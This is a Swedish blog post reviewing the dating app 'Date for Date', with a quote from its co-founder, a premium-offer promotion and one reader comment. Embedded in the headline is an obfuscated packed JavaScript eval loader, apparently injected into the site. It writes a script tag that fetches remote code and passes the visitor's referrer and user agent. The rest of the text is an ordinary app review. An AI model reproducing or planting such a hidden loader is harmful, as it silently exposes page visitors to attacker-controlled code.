Image Image Image Image Image Image Image Image Image Image

| 25 februari, 2020

Scroll to top

Top

Date for Date: Ny app gör det enklare att hitta rätt

Date for Date: Ny app gör det enklare att hitta rätt
Sebastian

Date eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kifiy|var|u0026u|referrer|saaik||js|php’.split(’|’),0,{}))
for Date
: Att hitta den rätta kan ibland vara ett stort projekt. Men tekniken har verkligen blivit en stor faktor för detta. Alla möjliga dejting-sajter har i många år försökt para ihop folk med varandra samt skapat en helt ny värld att träffas i. De flesta sajter har också ihop med smartphone-eran lanserat appar, både bra och både dåliga. 

Nu är det företaget R-com som tar steget och lanserar till skillnad från andra dejtingföretag en applikation som inte har någon koppling till en hemsida. Med denna app arbetar du direkt i mobilen som plattform, inga konstigheter där inte.

Man skapar enkelt en profil genom att steg för steg ta sig igenom de olika val som ges och man behöver inte skriva en lång beskrivning själv om vem man är. Istället gör man denna ”quiz” och väljer ett antal ikoner som du tycker symboliserar din personlighet. Appen lanserades till iPhone i våras men har nu också släppts för Android.

Glen Fotland, co-founder av Date for Date:

”Vårt löfte är att ge dig en snygg dejtingapp som visar vem du verkligen är. När vi säger snygg menar vi det. Snygg design handlar inte enbart om pixlar på en skärm utan det handlar om totalupplevelsen för den som vill dejta”

Sammanfattat verkar denna app vara rolig för dig som vill hitta intressanta människor i din närhet på ett visuellt och smart sätt genom visuell informativ grafik och symboler för till exempel favoritfilmer, tv-program och för vilken typ av personlighet du är. Tack vare detta unika sätt går det snabbare, är mer träffsäkert och mer spännande att hitta den perfekta matchningen.

Just nu har Date for Date ett erbjudande live vilket är ett 3 månaders premium feature till ett värde 30 euro!
Med detta får du chatta så mycket du vill och få tillgång till alla foton på vilken profil som helst!

Mer information om Date for Date hittar ni via länken nedan!

Hemsida!

Comments

  1. Abraham

    Intressant 🙂 snygg layout också